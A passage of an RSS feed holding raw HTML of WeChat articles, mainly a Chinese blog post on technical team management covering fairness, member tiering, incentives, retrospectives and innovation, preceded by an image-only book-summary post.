src="https://wechat2rss.xlab.app/video-proxy/?k=2663a741&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247483936%26idx%3D1%26sn%3D56f00f0bd5b3ef635393be51619632b6%26subscene%3D0&amp;v=wxv_2377729043736756226"></video></section><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;border-bottom: 1pt solid windowtext;padding: 0pt 0pt 1pt;line-height: 1.75em;"><span style="font-family: 等线;font-size: 17px;"><br/></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family: 等线;font-size: 17px;"><br/></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: center;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family: 等线;font-weight: bold;font-size: 20px;">分析内容</span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: center;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family: 等线;font-weight: bold;font-size: 20px;"></span><br/></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 等线;font-weight: bold;">樊登-可复制的领导力2 摘录及分析</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><br/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-backh="1467" data-backw="578" data-galleryid="" data-ratio="2.5388888888888888" data-s="300,640" style="width: 100%;height: auto;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=51ee6d4f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLub3ictvpEjjib7pdMbw0tb73r3U1jHPm35K6pYkxKAia0OxhxojVF6f3gREpl8RpxtFotyrsLHtYew%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><br/></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 等线;font-weight: bold;">樊登-可复制的领导力2引用的书籍</span></p><p style="text-align: center;margin-bottom: 0em;"><img class="rich_pages wxw-img" data-backh="529" data-backw="578" data-galleryid="" data-ratio="0.9153737658674189" data-s="300,640" style="width: 100%;height: auto;" data-type="png" data-w="1418" src="https://wechat2rss.xlab.app/img-proxy/?k=5a860148&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLub3ictvpEjjib7pdMbw0tb7C3Qm9964JFWTiboXePSkTqy4K7xaPBdXI0mqNWGLqiaiaN7ausKQ1mxOw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><br/></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: justify;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 等线;font-weight: normal;line-height: 1.75em;"><span style="font-family: 等线;font-weight: bold;font-size: 17px;">樊登-可复制的领导力</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.3962962962962964" data-s="300,640" data-backh="807" data-type="png" data-w="1080" style="width: 100%;height: auto;" data-backw="578" src="https://wechat2rss.xlab.app/img-proxy/?k=f623e183&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLub3ictvpEjjib7pdMbw0tb7IkmibdLcsJLeEw3OXMKVickAnkaB9zD4iaOBwtSSTuyZ6HG7icCV3DkeRg%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p><br/></p>



<p><a href="2247483936">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=b6d7b5dc&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247483936%26idx%3D1%26sn%3D56f00f0bd5b3ef635393be51619632b6%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 03 May 2022 18:39:00 +0800</pubDate>
    </item>
    <item>
      <title>技术管理所见所感-下卷</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247483905&amp;idx=1&amp;sn=2f0b40a22af8d98cc394224fc9e1e1a3</link>
      <description>高效团队、招人留人、目标管理、自我管理、沟通艺术、知行合一</description>
      <content:encoded><![CDATA[<p>
原创 <span>程远ing</span> <span>2022-02-05 07:59</span> <span style="display: inline-block;"></span>
</p>

<p>高效团队、招人留人、目标管理、自我管理、沟通艺术、知行合一</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=6349bc41&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtJrsEibp28GJT4TkGqDC8rFhvbUoWsG6AqVanCCKziclBne9ktSDzlcgpAXrnuv5XSj1xKibp4WuicsrQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 16pt;margin-bottom: 5px;margin-top: 5px;line-height: 1.75em;"><span style="font-family: 宋体;font-weight: normal;text-align: left;text-indent: 0pt;font-size: 18px;">上一篇，</span><a href="https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247483874&amp;idx=1&amp;sn=3d39988460f702190e7893967480bf6b&amp;scene=21#wechat_redirect" style="font-family: 宋体;font-weight: normal;text-align: left;text-indent: 0pt;" data-linktype="2"><span style="font-family: 宋体;font-weight: normal;text-align: left;text-indent: 0pt;font-size: 18px;">技术管理所见所感-上卷</span></a></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">FAQ问题清单：</span></p><ol class="list-paddingleft-2" style="list-style-type: decimal;"><li><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">如何向上、向下、跨部门、一对一沟通？</span></p></li><li><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">为什么给了高工资，依然留不住核心员工？</span></p></li><li><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">如何让自己更有说服力？</span></p></li><li><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">为什么我们不为创新欢呼？</span></p></li><li><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">为什么末尾绩效不认自己的绩效结果？</span></p></li><li><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">团队leader是铲屎官吗？</span></p></li><li><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">管理真的是管人管事吗？</span></p></li><li><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">知道了就一定能做到吗？</span><span style="font-family: 宋体;text-indent: -21pt;"></span></p></li></ol><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><br/></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><strong><span style="font-size: 17px;font-family: 宋体;">本文目录结构：</span></strong><span style="font-size: 17px;font-family: 宋体;"></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><em><span style="font-size: 17px;font-family: 宋体;">高效团队、招人留人、目标管理、自我管理、沟通艺术、知行合一</span></em><span style="text-align: center;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;"></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-ratio="1.6153300212916963" data-s="300,640" data-type="png" data-w="1409" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=400ca241&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJrsEibp28GJT4TkGqDC8rFhrk0asYLAjOSicFb1pI4hj48NRGOp5SvvarSFwsehJmlcl9uRMibzsd6A%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><br/></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h1 style="text-align: left;margin-left: 21.6pt;text-indent: -21.6pt;break-after: avoid;font-size: 22pt;font-family: 宋体;line-height: 1.75em;margin-top: 5px;margin-bottom: 5px;"><strong><span style="font-family: 宋体;font-size: 24px;">1 高效团队</span></strong><br/></h1><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-top: 5px;margin-bottom: 5px;"><strong><span style="">1.1 人性管理</span></strong></h2><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-weight: bold;font-size: 17px;">技术管理的本质—要做尊重人性的管理</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">现在这个时代，对管理者的要求非常高。作为一名优秀的技术负责人，一定要给团队指出正确的方向，必须同时要懂业务、懂产品、懂技术，但是更重要的是对于技术团队成员的管理，人才才是整个公司的根本。</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">1.满足员工最本质的需求，而不是永远画大饼</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">2.知道如何去批评员工才能让人更容易接受</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">3.对员工的预期要事先表达清楚</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">   透明的做事方式能够减少内耗，也能够让员工有一个非常清晰的目标，事半功倍</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">4.对人公平，以结果为主</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">管理者要对所有员工都一视同仁，尤其是在最终绩效考核的时候，一定要以实际表现为最终衡量标准（有章可循）。</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">5.并不是每个人都想当管理者，提拔干部需要看个人特质</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">管理需要一定的决断力和气场，但很多同学其实是相对的“老好人”，当被拉到某一个管理岗位的时候，相对偏“软”的性格会导致一些管理上的劣势，不一定能镇得住团队其他人。</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">6.人都喜欢相对简单的环境，尤其技术人才</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">总的来说，人性其实都是一样的，我们从更根本的去了解人的需求，这样会更容易摸到规律。推荐 “第一性原理思维”，解决或者思考问题都需要从本质出发，有时候甚至要回归到物理学的底层逻辑去。那么管理，其实也需要我们静下心来，思考人性的本质和人的根本诉求，这样我们才能更好的管理团队。  </span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-backh="298" data-backw="578" data-galleryid="" data-ratio="0.5155482815057283" data-s="300,640" data-type="png" data-w="1222" style="width: 100%;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=cb67e517&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJrsEibp28GJT4TkGqDC8rFhMXjzrSpy1GgqfhZiazNVZksnhPciat4gMMxdkFh4edbED5taSiaKGZudQ%2F640%3Fwx_fmt%3Dpng"/></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-top: 5px;margin-bottom: 5px;"><strong><span style="">1.2 成员分档</span></strong><br/></h2><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">团队成员简单为三类，一个是核心骨干，一个是骨干，一个是普通同学，不同的人有不同的带法，也就是不同的育人法和用人法。人才分档，大部分精力放在骨干、核心骨干上，承认精力有限后的资源最大化。“小白兔”员工放到合适的位置，切勿拔苗助长。</span><span style="text-align: center;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;"></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;"><br/></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-top: 5px;margin-bottom: 5px;"><span style="font-size: 20px;"><strong><span style="font-family: &#34;等线 Light&#34;;">1.3 日常管理</span></strong></span><br/></h2><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-weight: bold;font-size: 17px;">以事育人，因材施教</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">   培养下属、管理干部的时候，必须用一些事情让他们得到锻炼、让他们证明自己;</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;"><span style="font-family: 等线;">扶上马，送一程</span><span style="font-family: 宋体;">;</span></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-weight: bold;font-size: 17px;">言传身教，多做政委</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">   结合团队和个人发展目标，和下属共同制定他们的长线规划(被重视、被关怀)</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-weight: bold;font-size: 17px;">容人之短，用人之长</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">   有心有力、无心无力、有心无力、 有力无心（挑战性、拔高性需求）。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">每一个管理场景，总有一个最佳实践，所以我非常喜欢给我的员工做画像，因此才有之前提到的核心骨干、骨干、普通同学之分，才有有心有力、无心无力、有心无力、有力无心的区别。我们用大数据来分析我们的客户，为什么不能用数据来分析我们自己的兄弟，让他们在公司呆的更开心呢。</span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-backh="305" data-backw="578" data-galleryid="" data-ratio="0.5270049099836334" data-s="300,640" data-type="png" data-w="1222" style="width: 100%;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=1d29c3fd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJrsEibp28GJT4TkGqDC8rFhBjSMxGIMkjLZficB8lzq3PsUDwnO9d5HibSzySRPLJwM57lfk3n6CgRw%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-top: 5px;margin-bottom: 5px;"><span style="font-size: 20px;"><strong><span style="font-family: &#34;等线 Light&#34;;">1.4 公平公正</span></strong></span><br/></h2><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;color: rgb(255, 76, 0);">一个团队的核心就是创造公平公正的环境</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">关于公平的五个核心准则</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">1.意识层面的核心准则</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">先定好规矩，然后说话算话（“以终为本，能力为尺，人人平等”）</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">2.角色层面的核心准则</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">哪些工作属于自己的高优先级</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">3.制度层面的核心准则</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">4.执行层面的核心准则</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">权限就像风筝线，部属能力强了就放一放；部属能力弱了就收一收。</span></p><p style="margin-left: 21pt;text-indent: -21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">5.奖惩层面的核心准则</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">奖惩的公平不一定是人人平等，且预设统一的幅度，有时候奖惩的一视同仁才是最大的不公平，毕竟一个团队中每个人的岗位和承担的责任都有所不同。基于前面说到的角色层面，每个角色承担的责任是不同的，那么奖惩幅度和标准也应该是不同的。比如决策人和责任人，是需要额外解决问题做出决策的，他们做的好，贡献更大，奖励更高；他们出现了问题，那么可能不是一个 bug 的问题，所以惩罚可能更重，也倒逼着这个角色需要具备相对高的决策能力和全局思考能力的人来承担。当然打一份工拿一份工资这样的人也有，而且再正常不过，那么相应的，每次都只承担基础操作工作的人，奖励相对少，当然能出现的问题也很小，所以惩罚幅度也小。有担当的人自然敢于挑战，想打一份安稳工的人也有他选择的权利。</span><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;text-align: center;text-indent: 0pt;"></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;"></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-top: 5px;margin-bottom: 5px;"><strong><span style="">1.5 激励管理</span></strong><br/></h2><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">在管理中，高工资和奖金都是很有效的金钱激励手段，然而，还有很多非金钱激励手段，包括目标、成长、认可、授权、尊重、沟通、信任、文化等</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;"><img class="rich_pages wxw-img" data-backh="538" data-backw="553" data-ratio="0.972875226039783" data-type="png" data-w="553" style="width: 100%;height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=c17273b0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJrsEibp28GJT4TkGqDC8rFh2uh2Iom5NhaFENdvaX3yBV79YO8V8WxF5axO5ibyGYnmRy22vPcqeiag%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;"><br/></span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-bottom: 5px;margin-top: 5px;"><strong><span style="">1.6 复盘总结</span></strong><br/></h2><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">   无论是个人还是团队，都需要持续精进和学习，各行各业要学的内容非常多，一直学，的确有增量知识，但要很快达到体系化，总是有困难的，高效的方法就是通过复盘识别举一反三的通用类问题，然后解决这一类问题，逐渐丰富知识树。团队成员通过多复盘多分享，将日常项目或产品研发过程中零散的知识点串联起来，才能完善自己的知识体系，真正提升一个层次。同时，其他团队同事也能从中学习经验，吸取教训。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">可以复盘的内容很多，一位严格、高水平的技术Leader，这一环节应该是他花费大量时间的环节。复盘的参与人员不用很多，复盘会不要太严肃，它不是“批斗会”，而是为了总结经验，不断优化，不再犯同样的错误。对实践结果进行复盘，千万别做完实践就甩在一边了。找到自己这一次实践中犯的错误、需要改进的点、做做小笔记。当你量变产生质变的时候，回头看这些笔记，会特别的有感触。（知乎有篇帖子，真正的进步，是一个“不断打补丁”的过程）</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">所有的总结，带着问题去思考才会有收获，这就是复盘（总结经验和教训，沉淀业务与技术知识）。</span></p><hr style="border-style: solid;border-width: 1px 0 0;border-color: rgba(0,0,0,0.1);-webkit-transform-origin: 0 0;-webkit-transform: scale(1, 0.5);transform-origin: 0 0;transform: scale(1, 0.5);"/><h2 style="text-align: left;margin-left: 28.8pt;text-indent: -28.8pt;break-after: avoid;font-size: 16pt;margin-top: 5px;margin-bottom: 5px;"><span style="font-size: 20px;"><strong><span style="font-family: &#34;等线 Light&#34;;">1.7 创新路径</span></strong></span><br/></h2><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;text-indent: 21pt;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;">一个高效团队，完成工作甚至超额完成工作，大概率能让一个团队达到优秀。但从优秀到卓越的必经之路就是创新，当然创新也是一个技术人的高级追求。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;"><br/></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-size: 17px;font-family: 宋体;font-weight: bold;">基本认知</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;text-align: left;margin-left: 0pt;text-indent: 0pt;font-size: 10.5pt;font-family: 宋体;font-weight: normal;line-height: 1.75em;"><span style="font-family: 宋体;font-size: 17px;">   没有精神层面的支持，创新是无从谈起的，因为创新实在是一项艰巨的工作，概念的建立不是一蹴而就的，需要反复地推敲、对比、自我否定。问题的定义更是自我意识游走在理想与现实之间，尝试各种问题边界的可能，不断地进行权衡。人生贵在坚持批判性思维，而不是简单的批评与抱怨。所有这些行动都是很困难的，因为它们会产生巨大的认知摩擦。</span></p><p style="margin-top: 0pt;margin-bottom: 0pt;margin-left: 0pt;text-indent: 0pt;white-space: normal;text-align: left;font-size: 10.5pt;font-family: 宋体;line-height: 1.75em;box-sizing: content-box !important;"><span style="font-size: 17px;box-sizing: content-box !important;"><br/></span></p><p style="margin-top: 0pt;margin-bottom: 0pt;margin-left: 0pt;text-indent: 